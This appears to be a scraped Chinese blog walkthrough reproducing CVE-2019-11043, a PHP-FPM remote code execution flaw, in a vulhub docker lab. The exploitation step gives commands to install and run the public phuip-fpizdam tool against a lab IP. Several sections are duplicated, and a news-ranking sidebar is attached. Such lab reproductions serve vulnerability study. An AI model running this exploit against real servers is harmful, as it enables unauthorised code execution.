CVE-2019-11043 PHP-FPM执行任意代码
                        
                        
                        
                    0x00背景
在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。
在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。
0x01环境搭建
下载漏洞环境,使用docker搭建,漏洞环境地址https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043,进入漏洞环境目录,执行docker-compose up -d命令,进行安装。
 漏洞环境搭建成功,如图
漏洞环境搭建成功,如图
 0x02漏洞利用
在kali上配置好go环境,然后执行下面命令
0x02漏洞利用
在kali上配置好go环境,然后执行下面命令

 0x03参考链接
https://github.com/neex/phuip-fpizdam
https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043
0x03参考链接
https://github.com/neex/phuip-fpizdam
https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043
                    
                    
                 漏洞环境搭建成功,如图
漏洞环境搭建成功,如图
 0x02漏洞利用
在kali上配置好go环境,然后执行下面命令
0x02漏洞利用
在kali上配置好go环境,然后执行下面命令
go get github.com/neex/phuip-fpizdam
go install github.com/neex/phuip-fpizdam
./phuip-fpizdam http://192.168.175.135:8080/index.php

 0x03参考链接
https://github.com/neex/phuip-fpizdam
https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043
0x03参考链接
https://github.com/neex/phuip-fpizdam
https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
                            四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
                            让资讯触达的更精准有趣:https://www.0xu.cn/
                        
 关注网络尖刀微信公众号
            关注网络尖刀微信公众号随时掌握互联网精彩
            赞助链接
        
    
                排名
                热点
                搜索指数
            
            - 1 习主席的这些话亮明中国态度 7903962
- 2 美参议院通过终止特朗普关税决议 7807936
- 3 美国为何要疯狂攻击“北京时间” 7712921
- 4 1分钟带你看APEC 7615705
- 5 重大利好!免税店政策“大突破” 7520360
- 6 最高20万 多地发钱奖励结婚 7424163
- 7 微信宣布三大新功能 7331126
- 8 天津一小区围墙防盗刺插满烧饼馒头 7235134
- 9 第一批出家的00后已经还俗了 7143955
- 10 中国速度重新定义“距离” 7045809







 HackerEye
                HackerEye
             
                 
             
             
             
             
             
            